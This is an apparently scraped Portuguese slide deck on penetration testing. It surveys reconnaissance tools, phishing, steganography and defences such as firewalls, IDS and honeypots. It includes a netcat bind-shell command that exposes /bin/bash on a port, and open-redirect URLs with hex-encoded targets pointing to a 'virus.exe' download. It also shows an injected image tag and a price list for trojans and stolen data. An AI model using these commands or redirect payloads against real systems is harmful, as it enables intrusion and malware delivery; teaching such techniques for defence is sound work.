Upload
phillipe-martins
View
1.500
Download
6
Embed Size (px)
Citation preview
PENTEST
Técnicas de invasão e defesa
Por AnonFeh
www.phillipewebdesigner.com
www.virtuasolucoes.com
Tópicos
• Técnicas de
Invasão
• Definindo um alvo
• Recolhendo
informações
• Ferramentas úteis
• Phishing
• Esteganografia
• Técnicas contra
Invasão
• Firewall + IDS
• HIDS
• HoneyPots
• Antispam
Técnicas de invasão
• Engenharia social
• Brute Force
• Espionagem
• Segurança por obscuridade
Definindo um alvo
• Onde buscar informações?
• myspace
• orkut
• google groups
• Buscas específicas
• Utilizando recursos avançados do google
como
• as tags Intitle, Inurl, Intext
• Podem te trazer resultados muito
interessantes.
Engenharia social
• dig
• nmap
• nessus
• Metasploit
• telnet
• sendip
• john the ripper
• host
• hping3
• netcat
Ferramentas úteis
Dig
• Uma ferramenta similar ou nslookup
porém mais flexível, pode ser utilizada
para fazer buscas como A,TXT, MX e NS.
dig +qr google.com any
• ;; ANSWER SECTION:• google.com. 10186 IN
MX 10 smtp2.google.com.
• google.com. 10186 IN MX 10 smtp3.google.com.
• google.com. 10186 IN MX 10 smtp4.google.com.
• google.com. 10186 IN MX 10 smtp1.google.com.
• google.com. 318637 IN NS ns1.google.com.
• google.com. 318637 IN NS ns2.google.com.
• google.com. 318637 IN
NS ns3.google.com.• google.com. 318637 IN
NS ns4.google.com.• ;; AUTHORITY SECTION:• google.com. 318637 IN
NS ns2.google.com.• google.com. 318637 IN
NS ns3.google.com.• google.com. 318637 IN
NS ns4.google.com.• google.com. 318637 IN
NS ns1.google.com.
;; ADDITIONAL SECTION:• smtp1.google.com. 2986
IN A 72.14.203.25• smtp2.google.com. 2986
IN A 64.233.167.25• smtp3.google.com. 2986
IN A 64.233.183.25• smtp4.google.com. 2986
IN A 72.14.215.25• ns1.google.com. 345220
IN A 216.239.32.10• ns2.google.com. 345220
IN A 216.239.34.10• ns3.google.com. 345219
IN A 216.239.36.10• ns4.google.com. 345219
IN A 216.239.38.10
PortScan
Nmap
• é o mais famoso portscan existente hoje.
(www.insecure.org/nmap). É uma ótima
ferramenta, muito utilizado por hackers,
para descobrir falhas no sistema, em
portas abertas desnecessariamente.
Nessus
• O Nessus é uma ferramenta de auditoria
muito usada para detectar e corrigir
vulnerabilidades nos PCs da rede local
porem é muito utilizado por hackers para
descobrir a vulnerabilidade de um alvo.
Reports
Metasploit
• é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.
• Metasploit
• Linha de comando
• Interface web
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br80
• Trying 200.189.171.181...
• Connected to www.alvo.com.br.
• Escape character is '^]'.
• GET / HTTP/1.1
• Host: www.alvo.com.br
Resultado
• Server: Microsoft-IIS/5.0
• X-Powered-By: ASP.NET
• Content-Location: http://www.alvo.com.br/index.htm
• Date: Thu, 01 Nov 2007 13:26:39 GMT
• Content-Type: text/html
• Accept-Ranges: bytes
• Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
John The Ripper
Um programa usado para decifrar senhas
suportado nas plataformas UNIX, DOS,
WinNT?/Win95. É um programa disponível
gratuitamente desenvolvido para decifrar
senhas MD5, DES baseado na função
CRYPT.
hping3
• Mais uma ferramenta capaz de enviar
pacotes TCP, UDP e ICMP personalizados
e receber respostas como consegue em
icmp. Com ele você pode enviar arquivos
encapsulados e é util para ataques DoS.
netcat
• Programa para consultoria de redes muito
conhecido, isso deve-se ao fato de ele ser
um programa muito versátil, podendo
desde ser um simples telnet, portscan até
um sniffer.
netcat
• nc -l -e /bin/bash -p 1033
• A porta 1033 será colocada em listenning,
redirecionaremos a saída de dados para
um shell (/bin/bash). Assim quando
alguém se conectar a essa porta terá
domínio total sobre o computador.
Sniffer
• # nc -vv -z 75.126.176.71 -p 80 22 110 25 21
• servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
• servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
• servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
• servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
Phishing
• Phishing é um tipo de fraude projetada
para roubar sua identidade. Em um
phishing scam, uma pessoa mal-
intencionada tenta obter informações
como números de cartões de crédito,
senhas, dados de contas ou outras
informações pessoais convencendo você
a fornecê-las sob pretextos enganosos.
O que é phishing?
Exemplos de Phishing
• Alguns sites famosos que permitem este
tipo de fake:
• yahoo
• terra
• http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Yahoo
• http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=129lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Buscador terra
• http://buscador.terra.com.br/Redirector.aspx?bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=sponsored&partner=google&query=nike&position=1&target=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Destino???
• Nas 3 URLs anteriores a requisição seria
encaminhada para:
clebeer.no-ip.org/virus.exe
Outro Exemplo
http://www.cceinformatica.com.br/[email protected]
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Esteganografia
• Esteganografia basicamente é uma
técnica de esconder um arquivo dentro de
outro arquivo, podendo ser uma imagem ,
ou documento do Word até mesmo uma
planilha de excel e etc só que de uma
forma criptografada.
jp(hide an seek)
• O jphide e o jpseek são programas
utilizados para esconder mensagens em
arquivos JPEG.
origem.jpg
destino.jpg
msg.txt
• Olá esta mensagem e secretae somente
pessoas que possuam a senha podem vê-
la senha:
@@(##!(*#$#*(!(@&%$(@)codDEVdw)22
31
Utilização
• Esconder mensagem:
• jphide origem.jpg destino.jpg
mensagem.txt
• Descobir mensagem:
• jpseek destino.jpg texto-secreto.txt
Quanto vale?
Trojan (Shell) - US$ 350,00 - US$700,00
Trojan (Roubo de Senhas) - US$600,00
Listagem E-mail (32 milhões) - US$1.500,00
Milhões de Usuários do ICQ - US$150,00
Proteção Contra Detecção do Trojan -
US$20,00
Suporte
Tecnicas contra invasão
• Firewall
• (NHWK)IDS
• HoneyPots
• Antispam
Firewall
• Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas
só sejam abertas no momento desejado
atraves de tentativas de conexão em
portas específicas.
*IDS
• NIDS – Network Intrusion Detection System
• HIDS - Host-based Intrusion DetectionSystem
• WIDS – Wireless Intrusion Detection System
• KIDS - Kernel Intrusion Detection System
Honeypot
• Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor
não tenha acesso a rede real.
Antispam
• Indispensável para qualquer MX, útil para
evitar emails forjados e de domínios não
confiaveis, pode ser incrementado com
opções de RBL e CAPTCHA ("Completely
Automated Public Turing test to tell
Computers and Humans Apart").
Conclusão
• Com a popularidade do SL a informação
ficou mais acessível o que colaborou para
um maior avanço das técnicas de invasão,
em contra partida os sistemas de
segurança vem se tornando mais estáveis a casa dia.
Creditos
• Cartilha de Segurança - Códigos
maliciosos (Malware)
• http://cartilha.cert.br/malware/
• BRConnection - Internet Controlada
• http://www.brc.com.br/
www.virtuasolucoes.com
AnonFeh